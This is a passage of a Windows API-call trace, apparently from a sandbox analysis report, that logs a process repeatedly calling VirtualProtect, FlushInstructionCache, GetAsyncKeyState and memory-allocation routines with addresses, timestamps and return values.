GetCurrentProcess () returned 0xffffffff [0105.326] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6288, dwSize=0x14) returned 1 [0105.326] VirtualProtect (in: lpAddress=0xcaa6288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.326] GetCurrentProcess () returned 0xffffffff [0105.326] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6289, dwSize=0x2) returned 1 [0105.326] GetCurrentProcess () returned 0xffffffff [0105.326] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a8, dwSize=0x14) returned 1 [0105.326] VirtualProtect (in: lpAddress=0xcaa62a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.327] GetCurrentProcess () returned 0xffffffff [0105.327] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a9, dwSize=0x2) returned 1 [0105.327] GetCurrentProcess () returned 0xffffffff [0105.327] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c8, dwSize=0x14) returned 1 [0105.327] VirtualProtect (in: lpAddress=0xcaa62c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.328] GetCurrentProcess () returned 0xffffffff [0105.328] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c9, dwSize=0x2) returned 1 [0105.328] GetAsyncKeyState (vKey=3) returned 0 [0105.331] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.331] CRetailMalloc_Alloc () returned 0xcac76c0 [0105.331] memcpy (in: _Dst=0xaf5168, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0105.331] memcpy (in: _Dst=0xcac76e0, _Src=0x197724, _Size=0x18 | out: _Dst=0xcac76e0) returned 0xcac76e0 [0105.331] CRetailMalloc_Realloc () returned 0xcac76c0 [0105.331] CRetailMalloc_Free () returned 0x1 [0105.331] GetCurrentProcess () returned 0xffffffff [0105.331] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcc, dwSize=0x14) returned 1 [0105.331] VirtualProtect (in: lpAddress=0xcaa6dcc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.332] GetCurrentProcess () returned 0xffffffff [0105.332] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcd, dwSize=0x2) returned 1 [0105.332] GetCurrentProcess () returned 0xffffffff [0105.332] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dec, dwSize=0x14) returned 1 [0105.333] VirtualProtect (in: lpAddress=0xcaa6dec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.333] GetCurrentProcess () returned 0xffffffff [0105.333] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ded, dwSize=0x2) returned 1 [0105.333] GetCurrentProcess () returned 0xffffffff [0105.333] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0c, dwSize=0x14) returned 1 [0105.333] VirtualProtect (in: lpAddress=0xcaa6e0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.334] GetCurrentProcess () returned 0xffffffff [0105.334] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0d, dwSize=0x2) returned 1 [0105.334] GetCurrentProcess () returned 0xffffffff [0105.334] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2c, dwSize=0x14) returned 1 [0105.334] VirtualProtect (in: lpAddress=0xcaa6e2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.335] GetCurrentProcess () returned 0xffffffff [0105.335] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2d, dwSize=0x2) returned 1 [0105.335] GetCurrentProcess () returned 0xffffffff [0105.335] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4c, dwSize=0x14) returned 1 [0105.335] VirtualProtect (in: lpAddress=0xcaa6e4c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.336] GetCurrentProcess () returned 0xffffffff [0105.336] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4d, dwSize=0x2) returned 1 [0105.336] GetCurrentProcess () returned 0xffffffff [0105.336] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6c, dwSize=0x14) returned 1 [0105.336] VirtualProtect (in: lpAddress=0xcaa6e6c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.337] GetCurrentProcess () returned 0xffffffff [0105.337] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6d, dwSize=0x2) returned 1 [0105.337] GetCurrentProcess () returned 0xffffffff [0105.337] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8c, dwSize=0x14) returned 1 [0105.337] VirtualProtect (in: lpAddress=0xcaa6e8c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.338] GetCurrentProcess () returned 0xffffffff [0105.338] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8d, dwSize=0x2) returned 1 [0105.338] GetCurrentProcess () returned 0xffffffff [0105.338] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eac, dwSize=0x14) returned 1 [0105.338] VirtualProtect (in: lpAddress=0xcaa6eac, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.339] GetCurrentProcess () returned 0xffffffff [0105.339] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ead, dwSize=0x2) returned 1 [0105.339] GetCurrentProcess () returned 0xffffffff [0105.339] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecc, dwSize=0x14) returned 1 [0105.339] VirtualProtect (in: lpAddress=0xcaa6ecc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.340] GetCurrentProcess () returned 0xffffffff [0105.340] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecd, dwSize=0x2) returned 1 [0105.340] GetCurrentProcess () returned 0xffffffff [0105.340] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eec, dwSize=0x14) returned 1 [0105.340] VirtualProtect (in: lpAddress=0xcaa6eec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.341] GetCurrentProcess () returned 0xffffffff [0105.341] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eed, dwSize=0x2) returned 1 [0105.341] GetCurrentProcess () returned 0xffffffff [0105.341] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0c, dwSize=0x14) returned 1 [0105.341] VirtualProtect (in: lpAddress=0xcaa6f0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.341] GetCurrentProcess () returned 0xffffffff [0105.341] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0d, dwSize=0x2) returned 1 [0105.341] GetCurrentProcess () returned 0xffffffff [0105.341] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2c, dwSize=0x14) returned 1 [0105.341] VirtualProtect (in: lpAddress=0xcaa6f2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.342] GetCurrentProcess () returned 0xffffffff [0105.342] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2d, dwSize=0x2) returned 1 [0105.342] GetCurrentProcess () returned 0xffffffff [0105.342] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e0, dwSize=0x14) returned 1 [0105.342] VirtualProtect (in: lpAddress=0xcaa82e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.342] GetCurrentProcess () returned 0xffffffff [0105.342] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e1, dwSize=0x2) returned 1 [0105.342] GetCurrentProcess () returned 0xffffffff [0105.342] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8300, dwSize=0x14) returned 1 [0105.342] VirtualProtect (in: lpAddress=0xcaa8300, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.343] GetCurrentProcess () returned 0xffffffff [0105.343] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8301, dwSize=0x2) returned 1 [0105.343] GetCurrentProcess () returned 0xffffffff [0105.343] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8320, dwSize=0x14) returned 1 [0105.343] VirtualProtect (in: lpAddress=0xcaa8320, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.343] GetCurrentProcess () returned 0xffffffff [0105.343] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8321, dwSize=0x2) returned 1 [0105.343] GetCurrentProcess () returned 0xffffffff [0105.343] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8340, dwSize=0x14) returned 1 [0105.343] VirtualProtect (in: lpAddress=0xcaa8340, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.344] GetCurrentProcess () returned 0xffffffff [0105.344] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8341, dwSize=0x2) returned 1 [0105.344] GetCurrentProcess () returned 0xffffffff [0105.344] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8360, dwSize=0x14) returned 1 [0105.344] VirtualProtect (in: lpAddress=0xcaa8360, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.344] GetCurrentProcess () returned 0xffffffff [0105.344] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8361, dwSize=0x2) returned 1 [0105.344] GetCurrentProcess () returned 0xffffffff [0105.344] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8380, dwSize=0x14) returned 1 [0105.345] VirtualProtect (in: lpAddress=0xcaa8380, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.345] GetCurrentProcess () returned 0xffffffff [0105.345] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8381, dwSize=0x2) returned 1 [0105.345] GetCurrentProcess () returned 0xffffffff [0105.345] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a0, dwSize=0x14) returned 1 [0105.345] VirtualProtect (in: lpAddress=0xcaa83a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.346] GetCurrentProcess () returned 0xffffffff [0105.346] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a1, dwSize=0x2) returned 1 [0105.346] GetCurrentProcess () returned 0xffffffff [0105.346] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c0, dwSize=0x14) returned 1 [0105.346] VirtualProtect (in: lpAddress=0xcaa83c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.346] GetCurrentProcess () returned 0xffffffff [0105.346] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c1, dwSize=0x2) returned 1 [0105.346] GetCurrentProcess () returned 0xffffffff [0105.346] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e0, dwSize=0x14) returned 1 [0105.346] VirtualProtect (in: lpAddress=0xcaa83e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.347] GetCurrentProcess () returned 0xffffffff [0105.347] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e1, dwSize=0x2) returned 1 [0105.347] GetCurrentProcess () returned 0xffffffff [0105.347] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8400, dwSize=0x14) returned 1 [0105.347] VirtualProtect (in: lpAddress=0xcaa8400, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.347] GetCurrentProcess () returned 0xffffffff [0105.347] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8401, dwSize=0x2) returned 1 [0105.347] GetCurrentProcess () returned 0xffffffff [0105.347] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8420, dwSize=0x14) returned 1 [0105.347] VirtualProtect (in: lpAddress=0xcaa8420, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.348] GetCurrentProcess () returned 0xffffffff [0105.348] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8421, dwSize=0x2) returned 1 [0105.348] GetCurrentProcess () returned 0xffffffff [0105.348] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8440, dwSize=0x14) returned 1 [0105.348] VirtualProtect (in: lpAddress=0xcaa8440, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.348] GetCurrentProcess () returned 0xffffffff [0105.348] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8441, dwSize=0x2) returned 1 [0105.348] GetCurrentProcess () returned 0xffffffff [0105.348] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8460, dwSize=0x14) returned 1 [0105.348] VirtualProtect (in: lpAddress=0xcaa8460, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.349] GetCurrentProcess () returned 0xffffffff [0105.349] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8461, dwSize=0x2) returned 1 [0105.349] GetCurrentProcess () returned 0xffffffff [0105.349] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8480, dwSize=0x14) returned 1 [0105.349] VirtualProtect (in: lpAddress=0xcaa8480, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.349] GetCurrentProcess () returned 0xffffffff [0105.349] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8481, dwSize=0x2) returned 1 [0105.350] GetCurrentProcess () returned 0xffffffff [0105.350] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a0, dwSize=0x14) returned 1 [0105.350] VirtualProtect (in: lpAddress=0xcaa84a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.350] GetCurrentProcess () returned 0xffffffff [0105.350] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a1, dwSize=0x2) returned 1 [0105.350] GetCurrentProcess () returned 0xffffffff [0105.350] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c0, dwSize=0x14) returned 1 [0105.350] VirtualProtect (in: lpAddress=0xcaa84c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.351] GetCurrentProcess () returned 0xffffffff [0105.351] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c1, dwSize=0x2) returned 1 [0105.351] GetCurrentProcess () returned 0xffffffff [0105.351] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6288, dwSize=0x14) returned 1 [0105.351] VirtualProtect (in: lpAddress=0xcaa6288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.352] GetCurrentProcess () returned 0xffffffff [0105.352] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6289, dwSize=0x2) returned 1 [0105.352] GetCurrentProcess () returned 0xffffffff [0105.352] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a8, dwSize=0x14) returned 1 [0105.352] VirtualProtect (in: lpAddress=0xcaa62a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.352] GetCurrentProcess () returned 0xffffffff [0105.352] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a9, dwSize=0x2) returned 1 [0105.353] GetCurrentProcess () returned 0xffffffff [0105.353] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c8, dwSize=0x14) returned 1 [0105.353] VirtualProtect (in: lpAddress=0xcaa62c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.353] GetCurrentProcess () returned 0xffffffff [0105.353] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c9, dwSize=0x2) returned 1 [0105.354] GetAsyncKeyState (vKey=3) returned 0 [0105.354] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.405] GetAsyncKeyState (vKey=3) returned 0 [0105.405] CRetailMalloc_Alloc () returned 0xcac7720 [0105.405] memcpy (in: _Dst=0xaf5168, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0105.405] memcpy (in: _Dst=0xcac7740, _Src=0x197724, _Size=0x18 | out: _Dst=0xcac7740) returned 0xcac7740 [0105.405] CRetailMalloc_Realloc () returned 0xcac7720 [0105.405] CRetailMalloc_Free () returned 0x1 [0105.405] GetCurrentProcess () returned 0xffffffff [0105.405] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcc, dwSize=0x14) returned 1 [0105.405] VirtualProtect (in: lpAddress=0xcaa6dcc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.406] GetCurrentProcess () returned 0xffffffff [0105.406] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcd, dwSize=0x2) returned 1 [0105.406] GetCurrentProcess () returned 0xffffffff [0105.406] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dec, dwSize=0x14) returned 1 [0105.406] VirtualProtect (in: lpAddress=0xcaa6dec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.406] GetCurrentProcess () returned 0xffffffff [0105.406] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ded, dwSize=0x2) returned 1 [0105.407] GetCurrentProcess () returned 0xffffffff [0105.407] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0c, dwSize=0x14) returned 1 [0105.407] VirtualProtect (in: lpAddress=0xcaa6e0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.407] GetCurrentProcess () returned 0xffffffff [0105.407] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0d, dwSize=0x2) returned 1 [0105.407] GetCurrentProcess () returned 0xffffffff [0105.407] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2c, dwSize=0x14) returned 1 [0105.407] VirtualProtect (in: lpAddress=0xcaa6e2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.408] GetCurrentProcess () returned 0xffffffff [0105.408] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2d, dwSize=0x2) returned 1 [0105.408] GetCurrentProcess () returned 0xffffffff [0105.408] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4c, dwSize=0x14) returned 1 [0105.408] VirtualProtect (in: lpAddress=0xcaa6e4c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.408] GetCurrentProcess () returned 0xffffffff [0105.408] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4d, dwSize=0x2) returned 1 [0105.408] GetCurrentProcess () returned 0xffffffff [0105.408] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6c, dwSize=0x14) returned 1 [0105.408] VirtualProtect (in: lpAddress=0xcaa6e6c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.409] GetCurrentProcess () returned 0xffffffff [0105.409] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6d, dwSize=0x2) returned 1 [0105.409] GetCurrentProcess () returned 0xffffffff [0105.409] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8c, dwSize=0x14) returned 1 [0105.409] VirtualProtect (in: lpAddress=0xcaa6e8c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.409] GetCurrentProcess () returned 0xffffffff [0105.409] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8d, dwSize=0x2) returned 1 [0105.409] GetCurrentProcess () returned 0xffffffff [0105.409] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eac, dwSize=0x14) returned 1 [0105.410] VirtualProtect (in: lpAddress=0xcaa6eac, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.410] GetCurrentProcess () returned 0xffffffff [0105.410] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ead, dwSize=0x2) returned 1 [0105.410] GetCurrentProcess () returned 0xffffffff [0105.410] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecc, dwSize=0x14) returned 1 [0105.410] VirtualProtect (in: lpAddress=0xcaa6ecc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.410] GetCurrentProcess () returned 0xffffffff [0105.410] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecd, dwSize=0x2) returned 1 [0105.411] GetCurrentProcess () returned 0xffffffff [0105.411] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eec, dwSize=0x14) returned 1 [0105.411] VirtualProtect (in: lpAddress=0xcaa6eec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.411] GetCurrentProcess () returned 0xffffffff [0105.411] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eed, dwSize=0x2) returned 1 [0105.411] GetCurrentProcess () returned 0xffffffff [0105.411] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0c, dwSize=0x14) returned 1 [0105.411] VirtualProtect (in: lpAddress=0xcaa6f0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.412] GetCurrentProcess () returned 0xffffffff [0105.412] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0d, dwSize=0x2) returned 1 [0105.412] GetCurrentProcess () returned 0xffffffff [0105.412] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2c, dwSize=0x14) returned 1 [0105.412] VirtualProtect (in: lpAddress=0xcaa6f2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.412] GetCurrentProcess () returned 0xffffffff [0105.412] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2d, dwSize=0x2) returned 1 [0105.412] GetCurrentProcess () returned 0xffffffff [0105.412] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e0, dwSize=0x14) returned 1 [0105.412] VirtualProtect (in: lpAddress=0xcaa82e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.413] GetCurrentProcess () returned 0xffffffff [0105.413] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e1, dwSize=0x2) returned 1 [0105.413] GetCurrentProcess () returned 0xffffffff [0105.413] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8300, dwSize=0x14) returned 1 [0105.413] VirtualProtect (in: lpAddress=0xcaa8300, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.413] GetCurrentProcess () returned 0xffffffff [0105.413] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8301, dwSize=0x2) returned 1 [0105.413] GetCurrentProcess () returned 0xffffffff [0105.413] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8320, dwSize=0x14) returned 1 [0105.413] VirtualProtect (in: lpAddress=0xcaa8320, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.414] GetCurrentProcess () returned 0xffffffff [0105.414] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8321, dwSize=0x2) returned 1 [0105.414] GetCurrentProcess () returned 0xffffffff [0105.414] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8340, dwSize=0x14) returned 1 [0105.414] VirtualProtect (in: lpAddress=0xcaa8340, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.415] GetCurrentProcess () returned 0xffffffff [0105.415] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8341, dwSize=0x2) returned 1 [0105.415] GetCurrentProcess () returned 0xffffffff [0105.415] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8360, dwSize=0x14) returned 1 [0105.415] VirtualProtect (in: lpAddress=0xcaa8360, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.415] GetCurrentProcess () returned 0xffffffff [0105.415] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8361, dwSize=0x2) returned 1 [0105.416] GetCurrentProcess () returned 0xffffffff [0105.416] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8380, dwSize=0x14) returned 1 [0105.416] VirtualProtect (in: lpAddress=0xcaa8380, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.416] GetCurrentProcess () returned 0xffffffff [0105.416] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8381, dwSize=0x2) returned 1 [0105.416] GetCurrentProcess () returned 0xffffffff [0105.416] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a0, dwSize=0x14) returned 1 [0105.416] VirtualProtect (in: lpAddress=0xcaa83a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.417] GetCurrentProcess () returned 0xffffffff [0105.417] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a1, dwSize=0x2) returned 1 [0105.417] GetCurrentProcess () returned 0xffffffff [0105.417] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c0, dwSize=0x14) returned 1 [0105.418] VirtualProtect (in: lpAddress=0xcaa83c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.418] GetCurrentProcess () returned 0xffffffff [0105.418] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c1, dwSize=0x2) returned 1 [0105.418] GetCurrentProcess () returned 0xffffffff [0105.418] 